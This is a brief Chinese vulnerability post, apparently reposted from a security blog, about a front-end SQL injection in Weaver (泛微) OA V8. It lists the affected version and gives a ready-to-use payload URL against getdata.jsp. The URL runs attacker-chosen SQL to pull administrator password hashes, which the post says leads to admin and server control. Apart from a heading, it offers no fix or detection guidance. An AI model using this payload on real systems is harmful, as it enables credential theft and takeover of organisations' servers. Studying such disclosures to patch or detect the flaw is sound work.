漏洞简介
泛微OA V8 存在前台SQL注入漏洞,攻击者可以通过漏洞获取管理员密码hash,进而获取管理员权限和服务器权限
影响版本
V8
漏洞复现
复现步骤
payload如下:
http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
漏洞检测
安全小工坊
扫描二维码
关注我们!
文章转载自安全小工坊,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。
